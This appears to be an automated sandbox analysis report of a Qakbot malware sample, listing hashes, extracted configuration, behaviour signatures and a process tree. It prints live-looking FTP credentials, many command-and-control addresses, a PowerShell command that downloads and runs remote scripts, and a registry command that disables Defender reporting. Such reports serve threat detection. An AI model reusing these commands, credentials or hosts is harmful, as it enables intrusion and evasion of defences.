Analysis
-
max time kernel
148s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-05-2024 21:10
Static task
static1
Behavioral task
behavioral1
Sample
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
-
Size
596KB
-
MD5
310e65a59d3c670bc2bededf7ddef03e
-
SHA1
77153c24512610f9ff8e00bf944a9fee8c8f2974
-
SHA256
5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
-
SHA512
b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
-
SSDEEP
6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.358
mc06
1527585056
Protocol: ftp- Host:
37.60.244.211 - Port:
21 - Username:
[email protected] - Password:
4AsEzIaMwi2d
Protocol: ftp- Host:
198.38.77.162 - Port:
21 - Username:
[email protected] - Password:
kJm6DKVPfyiv
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
71.168.229.249:995
216.21.168.27:32101
216.218.74.196:443
46.177.55.119:443
66.222.48.40:443
93.108.180.227:443
47.40.29.239:443
184.180.157.203:2222
47.40.208.189:443
71.168.229.249:443
216.93.143.182:995
98.16.70.197:2222
75.127.141.50:995
96.248.15.254:995
74.87.248.174:2222
75.189.235.216:443
66.42.182.18:995
50.252.93.122:995
105.187.37.52:443
190.137.254.188:443
87.243.48.172:443
180.180.128.42:995
68.188.1.58:2078
67.83.122.112:2222
98.26.2.182:443
67.53.168.82:465
24.228.185.224:2222
75.110.87.185:443
68.46.145.243:443
74.88.210.56:995
173.81.42.136:443
68.207.36.211:443
185.219.83.73:443
47.223.85.190:443
190.185.219.110:443
24.100.46.201:2222
189.175.114.33:443
207.178.109.161:443
68.49.120.179:443
216.201.159.118:443
98.103.2.226:443
68.129.231.84:443
173.196.11.46:2222
70.94.109.57:443
66.189.228.49:995
98.242.248.219:443
72.215.129.5:443
71.190.202.120:443
67.42.92.9:443
67.238.217.83:443
47.157.103.78:2222
173.174.99.140:443
174.69.127.91:2083
68.133.47.150:443
24.175.99.25:443
184.90.44.223:443
144.163.12.226:443
68.113.142.24:465
71.1.31.71:443
75.135.8.120:443
65.173.74.217:2083
65.191.128.99:443
108.52.246.252:443
98.196.241.224:443
98.114.192.168:443
46.175.87.126:443
67.191.37.156:995
100.4.217.81:995
75.190.161.194:443
71.48.223.84:995
67.55.174.194:443
66.169.54.3:2222
68.206.133.7:443
73.227.31.181:995
73.40.24.158:443
24.6.31.163:443
173.209.20.200:443
97.70.85.248:443
50.80.129.234:443
65.169.66.123:2222
71.120.176.61:443
108.35.23.218:443
68.132.69.132:443
98.22.2.124:443
70.177.31.170:443
72.178.197.227:995
76.112.162.208:443
71.77.129.242:443
72.178.198.87:443
75.139.54.233:443
97.82.249.61:443
173.80.75.177:443
24.93.104.154:443
47.186.93.228:443
71.85.121.110:443
72.178.195.240:995
68.228.118.130:32100
71.85.72.9:443
208.104.163.142:443
68.74.206.211:465
68.228.32.150:443
98.243.166.148:443
47.221.46.163:443
68.207.48.140:443
72.183.161.77:443
104.33.252.147:443
47.134.180.77:443
99.197.182.183:443
75.106.233.194:443
76.101.165.66:443
70.118.18.242:443
70.169.12.141:443
77.122.224.184:995
173.160.3.209:443
73.18.9.164:443
73.58.60.60:443
70.21.182.149:2222
24.175.103.122:995
24.163.66.146:443
24.187.255.116:993
12.166.108.82:995
69.193.199.50:995
47.48.236.98:2222
24.45.182.71:2222
24.209.130.208:443
70.182.79.66:443
68.35.68.112:443
173.86.63.222:995
24.97.19.14:443
68.173.55.51:443
96.69.89.156:995
71.32.89.35:61200
63.79.135.0:443
69.145.82.204:443
76.16.122.156:443
66.68.188.203:443
76.169.73.234:443
174.195.142.124:443
72.178.203.107:443
107.15.153.110:443
24.42.164.2:22
50.198.141.161:2078
206.169.107.58:995
75.109.193.173:2222
173.248.25.11:443
96.73.55.193:993
75.109.193.173:1194
75.109.193.173:2087
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 5 2508 powershell.exe 6 2508 powershell.exe 7 2508 powershell.exe 8 2508 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
oloyme.exeoloyme.exepid process 2924 oloyme.exe 2576 oloyme.exe -
Loads dropped DLL 3 IoCs
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exepid process 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 2924 oloyme.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\xpxtwgita = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Oloymel\\oloyme.exe\"" explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exepowershell.exeoloyme.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXEpid process 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 2228 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 2228 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 2924 oloyme.exe 2508 powershell.exe 2576 oloyme.exe 2576 oloyme.exe 2388 explorer.exe 1060 taskhost.exe 2388 explorer.exe 1116 Dwm.exe 1144 Explorer.EXE 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 2508 powershell.exe 2516 conhost.exe 2388 explorer.exe 1560 cmd.exe 2136 conhost.exe 1196 PING.EXE 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe 2388 explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
oloyme.exepid process 2924 oloyme.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2508 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1144 Explorer.EXE 1144 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1144 Explorer.EXE 1144 Explorer.EXE -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exeexplorer.execmd.exedescription pid process target process PID 1900 wrote to memory of 2228 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1900 wrote to memory of 2228 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1900 wrote to memory of 2228 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1900 wrote to memory of 2228 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 1900 wrote to memory of 2924 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe oloyme.exe PID 1900 wrote to memory of 2924 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe oloyme.exe PID 1900 wrote to memory of 2924 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe oloyme.exe PID 1900 wrote to memory of 2924 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe oloyme.exe PID 1900 wrote to memory of 2600 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1900 wrote to memory of 2600 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1900 wrote to memory of 2600 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1900 wrote to memory of 2600 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe reg.exe PID 1900 wrote to memory of 2508 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 1900 wrote to memory of 2508 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 1900 wrote to memory of 2508 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 1900 wrote to memory of 2508 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe powershell.exe PID 2924 wrote to memory of 2576 2924 oloyme.exe oloyme.exe PID 2924 wrote to memory of 2576 2924 oloyme.exe oloyme.exe PID 2924 wrote to memory of 2576 2924 oloyme.exe oloyme.exe PID 2924 wrote to memory of 2576 2924 oloyme.exe oloyme.exe PID 2924 wrote to memory of 2388 2924 oloyme.exe explorer.exe PID 2924 wrote to memory of 2388 2924 oloyme.exe explorer.exe PID 2924 wrote to memory of 2388 2924 oloyme.exe explorer.exe PID 2924 wrote to memory of 2388 2924 oloyme.exe explorer.exe PID 2924 wrote to memory of 2388 2924 oloyme.exe explorer.exe PID 2388 wrote to memory of 1060 2388 explorer.exe taskhost.exe PID 2388 wrote to memory of 1060 2388 explorer.exe taskhost.exe PID 2388 wrote to memory of 1060 2388 explorer.exe taskhost.exe PID 2388 wrote to memory of 1116 2388 explorer.exe Dwm.exe PID 2388 wrote to memory of 1116 2388 explorer.exe Dwm.exe PID 2388 wrote to memory of 1116 2388 explorer.exe Dwm.exe PID 2388 wrote to memory of 1144 2388 explorer.exe Explorer.EXE PID 2388 wrote to memory of 1144 2388 explorer.exe Explorer.EXE PID 2388 wrote to memory of 1144 2388 explorer.exe Explorer.EXE PID 2388 wrote to memory of 1900 2388 explorer.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 2388 wrote to memory of 1900 2388 explorer.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 2388 wrote to memory of 1900 2388 explorer.exe 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe PID 2388 wrote to memory of 2508 2388 explorer.exe powershell.exe PID 2388 wrote to memory of 2508 2388 explorer.exe powershell.exe PID 2388 wrote to memory of 2508 2388 explorer.exe powershell.exe PID 2388 wrote to memory of 2516 2388 explorer.exe conhost.exe PID 2388 wrote to memory of 2516 2388 explorer.exe conhost.exe PID 2388 wrote to memory of 2516 2388 explorer.exe conhost.exe PID 1900 wrote to memory of 1560 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1900 wrote to memory of 1560 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1900 wrote to memory of 1560 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1900 wrote to memory of 1560 1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe cmd.exe PID 1560 wrote to memory of 1196 1560 cmd.exe PING.EXE PID 1560 wrote to memory of 1196 1560 cmd.exe PING.EXE PID 1560 wrote to memory of 1196 1560 cmd.exe PING.EXE PID 1560 wrote to memory of 1196 1560 cmd.exe PING.EXE PID 2388 wrote to memory of 1560 2388 explorer.exe cmd.exe PID 2388 wrote to memory of 1560 2388 explorer.exe cmd.exe PID 2388 wrote to memory of 1560 2388 explorer.exe cmd.exe PID 2388 wrote to memory of 2136 2388 explorer.exe conhost.exe PID 2388 wrote to memory of 2136 2388 explorer.exe conhost.exe PID 2388 wrote to memory of 2136 2388 explorer.exe conhost.exe PID 2388 wrote to memory of 1196 2388 explorer.exe PING.EXE PID 2388 wrote to memory of 1196 2388 explorer.exe PING.EXE PID 2388 wrote to memory of 1196 2388 explorer.exe PING.EXE
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exeC:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\tgjzpgomlpowqkdhfoncomzifwx.txt'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2024534483387295825-1226544225-361700570-1095156984-1620815177-1678529461-595417556"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1878583734-201756559515280159611729853069-131787287212318128711383084895391165972"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloym.datFilesize
91B
MD5eecd584cd13a011d0d867f3c98b08a80
SHA160154e3a34c8147d82c037dd802b71871ffce365
SHA25624574646ffa9166ff050ceecfe5034891037540882b76eef00ac75f38b540df0
SHA512f34a880842e9dc5206247596fdfe99e76996b304cc96d029a34767700e533eb228014a63613d0cdf15148a19439c3dea720408beca06877e93dc6499cee8ffb5
-
\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exeFilesize
596KB
MD5310e65a59d3c670bc2bededf7ddef03e
SHA177153c24512610f9ff8e00bf944a9fee8c8f2974
SHA2565cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
-
memory/1060-45-0x0000000000250000-0x0000000000251000-memory.dmpFilesize
4KB
-
memory/1060-39-0x00000000002B0000-0x00000000002DC000-memory.dmpFilesize
176KB
-
memory/1060-46-0x00000000002B0000-0x00000000002DC000-memory.dmpFilesize
176KB
-
memory/1060-41-0x0000000002060000-0x000000000208D000-memory.dmpFilesize
180KB
-
memory/1060-43-0x0000000000250000-0x0000000000251000-memory.dmpFilesize
4KB
-
memory/1116-55-0x0000000001EE0000-0x0000000001F0C000-memory.dmpFilesize
176KB
-
memory/1144-70-0x0000000002DA0000-0x0000000002DCC000-memory.dmpFilesize
176KB
-
memory/1900-72-0x0000000000630000-0x0000000000658000-memory.dmpFilesize
160KB
-
memory/1900-1-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/1900-0-0x00000000001C0000-0x00000000001C6000-memory.dmpFilesize
24KB
-
memory/1900-74-0x0000000002230000-0x0000000002259000-memory.dmpFilesize
164KB
-
memory/1900-78-0x00000000003F0000-0x00000000003F1000-memory.dmpFilesize
4KB
-
memory/1900-79-0x0000000000630000-0x0000000000658000-memory.dmpFilesize
160KB
-
memory/1900-81-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/2228-8-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/2228-7-0x00000000002A0000-0x00000000002A6000-memory.dmpFilesize
24KB
-
memory/2388-59-0x0000000002490000-0x00000000024BF000-memory.dmpFilesize
188KB
-
memory/2388-57-0x0000000002490000-0x00000000024BF000-memory.dmpFilesize
188KB
-
memory/2388-60-0x0000000002490000-0x00000000024BF000-memory.dmpFilesize
188KB
-
memory/2388-58-0x0000000000110000-0x000000000017A000-memory.dmpFilesize
424KB
-
memory/2388-61-0x0000000002490000-0x00000000024BF000-memory.dmpFilesize
188KB
-
memory/2388-38-0x0000000000110000-0x000000000017A000-memory.dmpFilesize
424KB
-
memory/2388-36-0x0000000000110000-0x000000000017A000-memory.dmpFilesize
424KB
-
memory/2508-27-0x0000000002760000-0x0000000002768000-memory.dmpFilesize
32KB
-
memory/2508-26-0x000000001B520000-0x000000001B802000-memory.dmpFilesize
2.9MB
-
memory/2576-34-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB
-
memory/2924-35-0x0000000000400000-0x0000000000498000-memory.dmpFilesize
608KB